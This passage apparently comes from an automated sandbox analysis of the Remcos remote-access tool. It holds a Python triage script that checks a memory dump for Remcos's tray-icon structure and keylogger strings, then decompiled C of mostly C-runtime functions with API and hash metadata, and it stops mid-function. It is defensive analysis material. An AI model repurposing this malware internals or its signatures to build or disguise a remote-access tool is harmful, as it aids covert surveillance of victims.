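The tray-icon setup in E00418D28 above fills a NOTIFYICONDATAA structure at 0x46bec0 field by field (cbSize 0x1fc, uID 1, uFlags 7, uCallbackMessage 0x401, szTip "Remcos"), hands it to Shell_NotifyIconA, and then blocks in a GetMessageA loop so the thread keeps running. The Python below is an added example, not part of this report and not Remcos code: it decodes that structure from a 32-bit memory dump using the shellapi.h NOTIFYICONDATAA layout (cbSize +0x00, hWnd +0x04, uID +0x08, uFlags +0x0c, uCallbackMessage +0x10, hIcon +0x14, szTip +0x18), checks the fields against the constants the decompiled code stores, and locates the two keylogger error strings listed for the neighbouring function. The dump bytes, the handle values, and the string placement at 0x45c000/0x45c100 are constructed for the example; the function names are assumptions of the example, not names from the report.

```python
import struct

# Constants taken from the decompiled E00418D28 (image base 0x400000 per the dump source line).
IMAGE_BASE = 0x00400000
NID_ADDR = 0x0046bec0            # NOTIFYICONDATAA global passed to Shell_NotifyIconA
NID_SIZE_FULL = 0x1fc            # value the code writes to cbSize (full NOTIFYICONDATAA)
NIF_MESSAGE, NIF_ICON, NIF_TIP = 0x1, 0x2, 0x4   # shellapi.h flag bits
WM_USER = 0x400                  # uCallbackMessage 0x401 == WM_USER + 1

TRAY_TIP = b"Remcos"
KEYLOG_ERR = b"Keylogger initialization failure: error "
ERR_TAG = b"[ERROR]"


def decode_notifyicondata(dump: bytes, base: int = IMAGE_BASE, addr: int = NID_ADDR) -> dict:
    """Decode the 32-bit NOTIFYICONDATAA at `addr` from a dump that starts at `base`."""
    off = addr - base
    cb, hwnd, uid, flags, cbmsg, hicon = struct.unpack_from("<6I", dump, off)
    tip = dump[off + 0x18: off + 0x18 + 0x80].split(b"\0", 1)[0]   # szTip[128], NUL-terminated
    names = [n for n, v in (("NIF_MESSAGE", NIF_MESSAGE), ("NIF_ICON", NIF_ICON),
                            ("NIF_TIP", NIF_TIP)) if flags & v]
    return {"cbSize": cb, "hWnd": hwnd, "uID": uid, "uFlags": flags, "flag_names": names,
            "uCallbackMessage": cbmsg, "hIcon": hicon, "szTip": tip.decode("latin-1")}


def matches_remcos_tray_setup(nid: dict) -> bool:
    """True when every field equals what E00418D28 stores before calling Shell_NotifyIconA."""
    return (nid["cbSize"] == NID_SIZE_FULL and nid["uID"] == 1
            and nid["uFlags"] == (NIF_MESSAGE | NIF_ICON | NIF_TIP)
            and nid["uCallbackMessage"] == WM_USER + 1
            and nid["szTip"] == "Remcos")


def find_strings(dump: bytes, base: int = IMAGE_BASE,
                 needles=(TRAY_TIP, KEYLOG_ERR, ERR_TAG)) -> dict:
    """Map each needle to the list of virtual addresses where it occurs in the dump."""
    hits = {}
    for n in needles:
        found, start = [], 0
        while (i := dump.find(n, start)) != -1:
            found.append(base + i)
            start = i + 1
        hits[n.decode("latin-1")] = found
    return hits


def build_constructed_dump() -> bytes:
    """CONSTRUCTED dump (not bytes from the report) with the struct filled as the code does."""
    buf = bytearray(0x6f000)
    off = NID_ADDR - IMAGE_BASE
    # hWnd and hIcon values are arbitrary placeholders for the handles the code obtains.
    struct.pack_into("<6I", buf, off, NID_SIZE_FULL, 0x000a0b0c, 1,
                     NIF_MESSAGE | NIF_ICON | NIF_TIP, WM_USER + 1, 0x00150001)
    buf[off + 0x18: off + 0x18 + len(TRAY_TIP) + 1] = TRAY_TIP + b"\0"
    # Error strings placed at assumed offsets (0x45c000 / 0x45c100 virtual).
    buf[0x5c000:0x5c000 + len(KEYLOG_ERR)] = KEYLOG_ERR
    buf[0x5c100:0x5c100 + len(ERR_TAG)] = ERR_TAG
    return bytes(buf)


def triage(dump: bytes, base: int = IMAGE_BASE) -> dict:
    """Combine the struct check and the string scan into one verdict dictionary."""
    nid = decode_notifyicondata(dump, base)
    strings = find_strings(dump, base)
    keylog_present = all(strings[k] for k in (KEYLOG_ERR.decode(), ERR_TAG.decode()))
    return {"tray": nid, "tray_matches": matches_remcos_tray_setup(nid),
            "strings": strings, "keylogger_strings_present": keylog_present}


if __name__ == "__main__":
    print(triage(build_constructed_dump()))
```

On a real dump, point `decode_notifyicondata` at the region that contains 0x46bec0 (the report lists it inside the 0x400000 dump) and expect the struct to be populated only if the dump was taken after E00418D28 ran; an all-zero structure means the tray thread had not started, not that the sample is different.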

                    C-Code - Quality: 77%
                    			E00446532(signed int _a4, void* _a8, unsigned int _a12) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* _v32;
                    				long _v36;
                    				void* _v40;
                    				long _v44;
                    				signed int* _t143;
                    				signed int _t145;
                    				intOrPtr _t149;
                    				signed int _t153;
                    				signed int _t155;
                    				signed char _t157;
                    				unsigned int _t158;
                    				intOrPtr _t162;
                    				void* _t163;
                    				signed int _t164;
                    				signed int _t167;
                    				long _t168;
                    				intOrPtr _t175;
                    				signed int _t176;
                    				intOrPtr _t178;
                    				signed int _t180;
                    				signed int _t184;
                    				char _t191;
                    				char* _t192;
                    				char _t199;
                    				char* _t200;
                    				signed char _t211;
                    				signed int _t213;
                    				long _t215;
                    				signed int _t216;
                    				char _t218;
                    				signed char _t222;
                    				signed int _t223;
                    				unsigned int _t224;
                    				intOrPtr _t225;
                    				unsigned int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				signed int _t235;
                    				signed char _t236;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t246;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t213 = _a4;
                    				if(_t213 != 0xfffffffe) {
                    					__eflags = _t213;
                    					if(_t213 < 0) {
                    						L58:
                    						_t143 = E0043A4F1();
                    						 *_t143 =  *_t143 & 0x00000000;
                    						__eflags =  *_t143;
                    						 *((intOrPtr*)(E0043A504())) = 9;
                    						L59:
                    						_t145 = E0043695D();
                    						goto L60;
                    					}
                    					__eflags = _t213 -  *0x46ba00; // 0x40
                    					if(__eflags >= 0) {
                    						goto L58;
                    					}
                    					_v24 = 1;
                    					_t239 = _t213 >> 6;
                    					_t235 = (_t213 & 0x0000003f) * 0x30;
                    					_v20 = _t239;
                    					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                    					_v28 = _t235;
                    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                    					_v5 = _t222;
                    					__eflags = _t222 & 0x00000001;
                    					if((_t222 & 0x00000001) == 0) {
                    						goto L58;
                    					}
                    					_t223 = _a12;
                    					__eflags = _t223 - 0x7fffffff;
                    					if(_t223 <= 0x7fffffff) {
                    						__eflags = _t223;
                    						if(_t223 == 0) {
                    							L57:
                    							return 0;
                    						}
                    						__eflags = _v5 & 0x00000002;
                    						if((_v5 & 0x00000002) != 0) {
                    							goto L57;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							goto L6;
                    						}
                    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                    						_v5 = _t153;
                    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                    						_t246 = 0;
                    						_t155 = _t153 - 1;
                    						__eflags = _t155;
                    						if(_t155 == 0) {
                    							_t236 = _v24;
                    							_t157 =  !_t223;
                    							__eflags = _t236 & _t157;
                    							if((_t236 & _t157) != 0) {
                    								_t158 = 4;
                    								_t224 = _t223 >> 1;
                    								_v16 = _t158;
                    								__eflags = _t224 - _t158;
                    								if(_t224 >= _t158) {
                    									_t158 = _t224;
                    									_v16 = _t224;
                    								}
                    								_t246 = E0043F98C(_t224, _t158);
                    								E004401F5(0);
                    								E004401F5(0);
                    								_t249 = _t248 + 0xc;
                    								_v12 = _t246;
                    								__eflags = _t246;
                    								if(_t246 != 0) {
                    									_t162 = E00445A9E(_t213, 0, 0, _v24);
                    									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                    									_t248 = _t249 + 0x10;
                    									_t240 = _v28;
                    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                    									_t163 = _t246;
                    									 *(_t240 + _t225 + 0x24) = _t236;
                    									_t235 = _t240;
                    									_t223 = _v16;
                    									L21:
                    									_t241 = 0;
                    									_v40 = _t163;
                    									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                    									_v36 = _t215;
                    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                    									_t216 = _a4;
                    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                    										_v6 = _t218;
                    										__eflags = _t218 - 0xa;
                    										_t216 = _a4;
                    										if(_t218 != 0xa) {
                    											__eflags = _t223;
                    											if(_t223 != 0) {
                    												_t241 = _v24;
                    												 *_t163 = _v6;
                    												_t216 = _a4;
                    												_t232 = _t223 - 1;
                    												__eflags = _v5;
                    												_v12 = _t163 + 1;
                    												_v16 = _t232;
                    												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
                    												if(_v5 != 0) {
                    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
                    													_v6 = _t191;
                    													__eflags = _t191 - 0xa;
                    													if(_t191 != 0xa) {
                    														__eflags = _t232;
                    														if(_t232 != 0) {
                    															_t192 = _v12;
                    															_t241 = 2;
                    															 *_t192 = _v6;
                    															_t216 = _a4;
                    															_t233 = _t232 - 1;
                    															_v12 = _t192 + 1;
                    															_v16 = _t233;
                    															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
                    															__eflags = _v5 - _v24;
                    															if(_v5 == _v24) {
                    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
                    																_v6 = _t199;
                    																__eflags = _t199 - 0xa;
                    																if(_t199 != 0xa) {
                    																	__eflags = _t233;
                    																	if(_t233 != 0) {
                    																		_t200 = _v12;
                    																		_t241 = 3;
                    																		 *_t200 = _v6;
                    																		_t216 = _a4;
                    																		_t234 = _t233 - 1;
                    																		__eflags = _t234;
                    																		_v12 = _t200 + 1;
                    																		_v16 = _t234;
                    																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
                    																	}
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    									_t164 = E0044E817(_t216);
                    									__eflags = _t164;
                    									if(_t164 == 0) {
                    										L41:
                    										_v24 = 0;
                    										L42:
                    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                    										__eflags = _t167;
                    										if(_t167 == 0) {
                    											L53:
                    											_t168 = GetLastError();
                    											_t241 = 5;
                    											__eflags = _t168 - _t241;
                    											if(_t168 != _t241) {
                    												__eflags = _t168 - 0x6d;
                    												if(_t168 != 0x6d) {
                    													L37:
                    													E0043A4CE(_t168);
                    													goto L38;
                    												}
                    												_t242 = 0;
                    												goto L39;
                    											}
                    											 *((intOrPtr*)(E0043A504())) = 9;
                    											 *(E0043A4F1()) = _t241;
                    											goto L38;
                    										}
                    										_t229 = _a12;
                    										__eflags = _v36 - _t229;
                    										if(_v36 > _t229) {
                    											goto L53;
                    										}
                    										_t242 = _t241 + _v36;
                    										__eflags = _t242;
                    										L45:
                    										_t237 = _v28;
                    										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                    											__eflags = _v5 - 2;
                    											if(_v5 == 2) {
                    												__eflags = _v24;
                    												_push(_t242 >> 1);
                    												_push(_v40);
                    												_push(_t216);
                    												if(_v24 == 0) {
                    													_t176 = E0044608E();
                    												} else {
                    													_t176 = E0044639E();
                    												}
                    											} else {
                    												_t230 = _t229 >> 1;
                    												__eflags = _t229 >> 1;
                    												_t176 = E0044624E(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                    											}
                    											_t242 = _t176;
                    										}
                    										goto L39;
                    									}
                    									_t231 = _v28;
                    									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                    										goto L41;
                    									}
                    									_t180 = GetConsoleMode(_v32,  &_v44);
                    									__eflags = _t180;
                    									if(_t180 == 0) {
                    										goto L41;
                    									}
                    									__eflags = _v5 - 2;
                    									if(_v5 != 2) {
                    										goto L42;
                    									}
                    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                    									__eflags = _t184;
                    									if(_t184 != 0) {
                    										_t229 = _a12;
                    										_t242 = _t241 + _v36 * 2;
                    										goto L45;
                    									}
                    									_t168 = GetLastError();
                    									goto L37;
                    								} else {
                    									 *((intOrPtr*)(E0043A504())) = 0xc;
                    									 *(E0043A4F1()) = 8;
                    									L38:
                    									_t242 = _t241 | 0xffffffff;
                    									__eflags = _t242;
                    									L39:
                    									E004401F5(_t246);
                    									return _t242;
                    								}
                    							}
                    							L15:
                    							 *(E0043A4F1()) =  *_t206 & _t246;
                    							 *((intOrPtr*)(E0043A504())) = 0x16;
                    							E0043695D();
                    							goto L38;
                    						}
                    						__eflags = _t155 != 1;
                    						if(_t155 != 1) {
                    							L13:
                    							_t163 = _a8;
                    							_v16 = _t223;
                    							_v12 = _t163;
                    							goto L21;
                    						}
                    						_t211 =  !_t223;
                    						__eflags = _t211 & 0x00000001;
                    						if((_t211 & 0x00000001) == 0) {
                    							goto L15;
                    						}
                    						goto L13;
                    					}
                    					L6:
                    					 *(E0043A4F1()) =  *_t151 & 0x00000000;
                    					 *((intOrPtr*)(E0043A504())) = 0x16;
                    					goto L59;
                    				} else {
                    					 *(E0043A4F1()) =  *_t212 & 0x00000000;
                    					_t145 = E0043A504();
                    					 *_t145 = 9;
                    					L60:
                    					return _t145 | 0xffffffff;
                    				}
                    			}
                    Instruction addresses for E00446532 (one per source line above, non-contiguous): 0x0044653b to 0x004468de

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
                    • Instruction ID: 967283b79ba0ff2862e9fd1e91011e9ab355d2b8f59743005224cd781b83b7a3
                    • Opcode Fuzzy Hash: abd92cef6058376eee906444e9d74b82ad6f4ac93f3cb8c56c23ee022f772796
                    • Instruction Fuzzy Hash: 6EC11B70D05249AFEF11EFA8C841BAEBBB4BF1A314F05415AE54097392C7789941CF6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0044E8D5(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                    				signed int _v8;
                    				char _v22;
                    				struct _cpinfo _v28;
                    				short* _v32;
                    				int _v36;
                    				char* _v40;
                    				int _v44;
                    				intOrPtr _v48;
                    				void* _v60;
                    				signed int _t63;
                    				int _t70;
                    				signed int _t72;
                    				short* _t73;
                    				signed int _t77;
                    				short* _t87;
                    				void* _t89;
                    				void* _t92;
                    				int _t99;
                    				intOrPtr _t101;
                    				intOrPtr _t102;
                    				signed int _t112;
                    				char* _t114;
                    				char* _t115;
                    				void* _t120;
                    				void* _t121;
                    				intOrPtr _t122;
                    				intOrPtr _t123;
                    				intOrPtr* _t125;
                    				short* _t126;
                    				int _t128;
                    				int _t129;
                    				short* _t130;
                    				intOrPtr* _t131;
                    				signed int _t132;
                    				short* _t133;
                    
                    				_t63 =  *0x46a00c; // 0xee31ea10
                    				_v8 = _t63 ^ _t132;
                    				_t128 = _a20;
                    				_v44 = _a4;
                    				_v48 = _a8;
                    				_t67 = _a24;
                    				_v40 = _a24;
                    				_t125 = _a16;
                    				_v36 = _t125;
                    				if(_t128 <= 0) {
                    					if(_t128 >= 0xffffffff) {
                    						goto L2;
                    					} else {
                    						goto L5;
                    					}
                    				} else {
                    					_t128 = E004401D9(_t125, _t128);
                    					_t67 = _v40;
                    					L2:
                    					_t99 = _a28;
                    					if(_t99 <= 0) {
                    						if(_t99 < 0xffffffff) {
                    							goto L5;
                    						} else {
                    							goto L7;
                    						}
                    					} else {
                    						_t99 = E004401D9(_t67, _t99);
                    						L7:
                    						_t70 = _a32;
                    						if(_t70 == 0) {
                    							_t70 =  *( *_v44 + 8);
                    							_a32 = _t70;
                    						}
                    						if(_t128 == 0 || _t99 == 0) {
                    							if(_t128 != _t99) {
                    								if(_t99 <= 1) {
                    									if(_t128 <= 1) {
                    										if(GetCPInfo(_t70,  &_v28) == 0) {
                    											goto L5;
                    										} else {
                    											if(_t128 <= 0) {
                    												if(_t99 <= 0) {
                    													goto L36;
                    												} else {
                    													_t89 = 2;
                    													if(_v28 >= _t89) {
                    														_t114 =  &_v22;
                    														if(_v22 != 0) {
                    															_t131 = _v40;
                    															while(1) {
                    																_t122 =  *((intOrPtr*)(_t114 + 1));
                    																if(_t122 == 0) {
                    																	goto L15;
                    																}
                    																_t101 =  *_t131;
                    																if(_t101 <  *_t114 || _t101 > _t122) {
                    																	_t114 = _t114 + _t89;
                    																	if( *_t114 != 0) {
                    																		continue;
                    																	} else {
                    																		goto L15;
                    																	}
                    																}
                    																goto L63;
                    															}
                    														}
                    													}
                    													goto L15;
                    												}
                    											} else {
                    												_t92 = 2;
                    												if(_v28 >= _t92) {
                    													_t115 =  &_v22;
                    													if(_v22 != 0) {
                    														while(1) {
                    															_t123 =  *((intOrPtr*)(_t115 + 1));
                    															if(_t123 == 0) {
                    																goto L17;
                    															}
                    															_t102 =  *_t125;
                    															if(_t102 <  *_t115 || _t102 > _t123) {
                    																_t115 = _t115 + _t92;
                    																if( *_t115 != 0) {
                    																	continue;
                    																} else {
                    																	goto L17;
                    																}
                    															}
                    															goto L63;
                    														}
                    													}
                    												}
                    												goto L17;
                    											}
                    										}
                    									} else {
                    										L17:
                    										_push(3);
                    										goto L13;
                    									}
                    								} else {
                    									L15:
                    								}
                    							} else {
                    								_push(2);
                    								L13:
                    							}
                    						} else {
                    							L36:
                    							_t126 = 0;
                    							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                    							_v44 = _t72;
                    							if(_t72 == 0) {
                    								L5:
                    							} else {
                    								_t120 = _t72 + _t72;
                    								asm("sbb eax, eax");
                    								if((_t120 + 0x00000008 & _t72) == 0) {
                    									_t73 = 0;
                    									_v32 = 0;
                    									goto L45;
                    								} else {
                    									asm("sbb eax, eax");
                    									_t85 = _t72 & _t120 + 0x00000008;
                    									_t112 = _t120 + 8;
                    									if((_t72 & _t120 + 0x00000008) > 0x400) {
                    										asm("sbb eax, eax");
                    										_t87 = E0043F98C(_t112, _t85 & _t112);
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											goto L61;
                    										} else {
                    											 *_t87 = 0xdddd;
                    											goto L43;
                    										}
                    									} else {
                    										asm("sbb eax, eax");
                    										E00450810();
                    										_t87 = _t133;
                    										_v32 = _t87;
                    										if(_t87 == 0) {
                    											L61:
                    											_t100 = _v32;
                    										} else {
                    											 *_t87 = 0xcccc;
                    											L43:
                    											_t73 =  &(_t87[4]);
                    											_v32 = _t73;
                    											L45:
                    											if(_t73 == 0) {
                    												goto L61;
                    											} else {
                    												_t129 = _a32;
                    												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                    													goto L61;
                    												} else {
                    													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                    													_v36 = _t77;
                    													if(_t77 == 0) {
                    														goto L61;
                    													} else {
                    														_t121 = _t77 + _t77;
                    														_t108 = _t121 + 8;
                    														asm("sbb eax, eax");
                    														if((_t121 + 0x00000008 & _t77) == 0) {
                    															_t130 = _t126;
                    															goto L56;
                    														} else {
                    															asm("sbb eax, eax");
                    															_t81 = _t77 & _t121 + 0x00000008;
                    															_t108 = _t121 + 8;
                    															if((_t77 & _t121 + 0x00000008) > 0x400) {
                    																asm("sbb eax, eax");
                    																_t130 = E0043F98C(_t108, _t81 & _t108);
                    																_pop(_t108);
                    																if(_t130 == 0) {
                    																	goto L59;
                    																} else {
                    																	 *_t130 = 0xdddd;
                    																	goto L54;
                    																}
                    															} else {
                    																asm("sbb eax, eax");
                    																E00450810();
                    																_t130 = _t133;
                    																if(_t130 == 0) {
                    																	L59:
                    																	_t100 = _v32;
                    																} else {
                    																	 *_t130 = 0xcccc;
                    																	L54:
                    																	_t130 =  &(_t130[4]);
                    																	L56:
                    																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                    																		goto L59;
                    																	} else {
                    																		_t100 = _v32;
                    																		_t126 = E004420FC(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                    																	}
                    																}
                    															}
                    														}
                    														E00430BA0(_t130);
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    								E00430BA0(_t100);
                    							}
                    						}
                    					}
                    				}
                    				L63:
                    				return E0042FD1B(_v8 ^ _t132);
                    			}

                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044E981
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA04
                    • __alloca_probe_16.LIBCMT ref: 0044EA3C
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044EBAE,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EA97
                    • __alloca_probe_16.LIBCMT ref: 0044EAE6
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EAAE
                      • Part of subcall function 0043F98C: RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044EBAE,00000000,00000000,?,00000001,?,?,?,?), ref: 0044EB2A
                    • __freea.LIBCMT ref: 0044EB55
                    • __freea.LIBCMT ref: 0044EB61
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID:
                    • API String ID: 201697637-0
                    • Opcode ID: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                    • Instruction ID: 57d3b8f3912e80867dbd5bea15d3c0571bce0196d8e9b81a223875e0514adfa6
                    • Opcode Fuzzy Hash: 32218eb1e629b46f8e44902807a92171ca436c95332ad8c55ee50f46f9c4f122
                    • Instruction Fuzzy Hash: 9791C2B1E002569AEF208E66C841AAFBBA5FF09754F14066BE805E7281D739DC418769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E0043E9CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                    				signed int _v8;
                    				short _v270;
                    				short _v272;
                    				char _v528;
                    				char _v700;
                    				signed int _v704;
                    				signed int _v708;
                    				short _v710;
                    				signed int* _v712;
                    				signed int _v716;
                    				signed int _v720;
                    				signed int _v724;
                    				signed int* _v728;
                    				signed int _v732;
                    				signed int _v736;
                    				signed int _v740;
                    				signed int _v744;
                    				signed int _t149;
                    				void* _t156;
                    				signed int _t157;
                    				signed int _t158;
                    				intOrPtr _t159;
                    				signed int _t162;
                    				signed int _t166;
                    				signed int _t167;
                    				intOrPtr _t169;
                    				signed int _t172;
                    				signed int _t173;
                    				signed int _t175;
                    				signed int _t195;
                    				signed int _t196;
                    				signed int _t199;
                    				signed int _t204;
                    				signed int _t207;
                    				intOrPtr* _t213;
                    				intOrPtr* _t214;
                    				signed int _t225;
                    				signed int _t228;
                    				intOrPtr* _t229;
                    				signed int _t231;
                    				signed int* _t235;
                    				void* _t243;
                    				signed int _t244;
                    				intOrPtr _t246;
                    				signed int _t251;
                    				signed int _t253;
                    				signed int _t257;
                    				signed int* _t258;
                    				intOrPtr* _t259;
                    				short _t260;
                    				signed int _t262;
                    				signed int _t264;
                    				void* _t266;
                    				void* _t268;
                    
                    				_t262 = _t264;
                    				_t149 =  *0x46a00c; // 0xee31ea10
                    				_v8 = _t149 ^ _t262;
                    				_push(__ebx);
                    				_t207 = _a8;
                    				_push(__esi);
                    				_push(__edi);
                    				_t246 = _a4;
                    				_v744 = _t207;
                    				_v728 = E00441CE2(_t207, __ecx, __edx) + 0x278;
                    				_push( &_v708);
                    				_t156 = E0043E118(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                    				_t266 = _t264 - 0x2e4 + 0x18;
                    				if(_t156 != 0) {
                    					_t11 = _t207 + 2; // 0x6
                    					_t251 = _t11 << 4;
                    					__eflags = _t251;
                    					_t157 =  &_v272;
                    					_v716 = _t251;
                    					_t213 =  *((intOrPtr*)(_t251 + _t246));
                    					while(1) {
                    						_v704 = _v704 & 0x00000000;
                    						__eflags =  *_t157 -  *_t213;
                    						_t253 = _v716;
                    						if( *_t157 !=  *_t213) {
                    							break;
                    						}
                    						__eflags =  *_t157;
                    						if( *_t157 == 0) {
                    							L8:
                    							_t158 = _v704;
                    						} else {
                    							_t260 =  *((intOrPtr*)(_t157 + 2));
                    							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                    							_v710 = _t260;
                    							_t253 = _v716;
                    							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                    								break;
                    							} else {
                    								_t157 = _t157 + 4;
                    								_t213 = _t213 + 4;
                    								__eflags = _v710;
                    								if(_v710 != 0) {
                    									continue;
                    								} else {
                    									goto L8;
                    								}
                    							}
                    						}
                    						L10:
                    						__eflags = _t158;
                    						if(_t158 != 0) {
                    							_t214 =  &_v272;
                    							_t243 = _t214 + 2;
                    							do {
                    								_t159 =  *_t214;
                    								_t214 = _t214 + 2;
                    								__eflags = _t159 - _v704;
                    							} while (_t159 != _v704);
                    							_v720 = (_t214 - _t243 >> 1) + 1;
                    							_t162 = E0043F98C(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                    							_v732 = _t162;
                    							__eflags = _t162;
                    							if(_t162 == 0) {
                    								goto L1;
                    							} else {
                    								_v724 =  *((intOrPtr*)(_t253 + _t246));
                    								_t35 = _t207 * 4; // 0xb94f
                    								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                    								_t38 = _t246 + 8; // 0x8b56ff8b
                    								_v740 =  *_t38;
                    								_t223 =  &_v272;
                    								_v712 = _t162 + 4;
                    								_t166 = E004415D4(_t162 + 4, _v720,  &_v272);
                    								_t268 = _t266 + 0xc;
                    								__eflags = _t166;
                    								if(_t166 != 0) {
                    									_t167 = _v704;
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									_push(_t167);
                    									E0043698A();
                    									asm("int3");
                    									_t169 =  *0x46b508; // 0x0
                    									return _t169;
                    								} else {
                    									__eflags = _v272 - 0x43;
                    									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                    									if(_v272 != 0x43) {
                    										L19:
                    										_t172 = E0043DE25(_t207, _t223, _t246,  &_v700);
                    										_t225 = _v704;
                    										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                    									} else {
                    										__eflags = _v270;
                    										if(_v270 != 0) {
                    											goto L19;
                    										} else {
                    											_t225 = _v704;
                    											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                    										}
                    									}
                    									__eflags = _t207 - 2;
                    									if(_t207 != 2) {
                    										__eflags = _t207 - 1;
                    										if(_t207 != 1) {
                    											__eflags = _t207 - 5;
                    											if(_t207 == 5) {
                    												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                    											}
                    										} else {
                    											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                    										}
                    									} else {
                    										_t258 = _v728;
                    										_t244 = _t225;
                    										_t235 = _t258;
                    										 *(_t246 + 8) = _v708;
                    										_v712 = _t258;
                    										_v720 = _t258[8];
                    										_v708 = _t258[9];
                    										while(1) {
                    											_t64 = _t246 + 8; // 0x8b56ff8b
                    											__eflags =  *_t64 -  *_t235;
                    											if( *_t64 ==  *_t235) {
                    												break;
                    											}
                    											_t259 = _v712;
                    											_t244 = _t244 + 1;
                    											_t204 =  *_t235;
                    											 *_t259 = _v720;
                    											_v708 = _t235[1];
                    											_t235 = _t259 + 8;
                    											 *((intOrPtr*)(_t259 + 4)) = _v708;
                    											_t207 = _v744;
                    											_t258 = _v728;
                    											_v720 = _t204;
                    											_v712 = _t235;
                    											__eflags = _t244 - 5;
                    											if(_t244 < 5) {
                    												continue;
                    											} else {
                    											}
                    											L27:
                    											__eflags = _t244 - 5;
                    											if(__eflags == 0) {
                    												_t88 = _t246 + 8; // 0x8b56ff8b
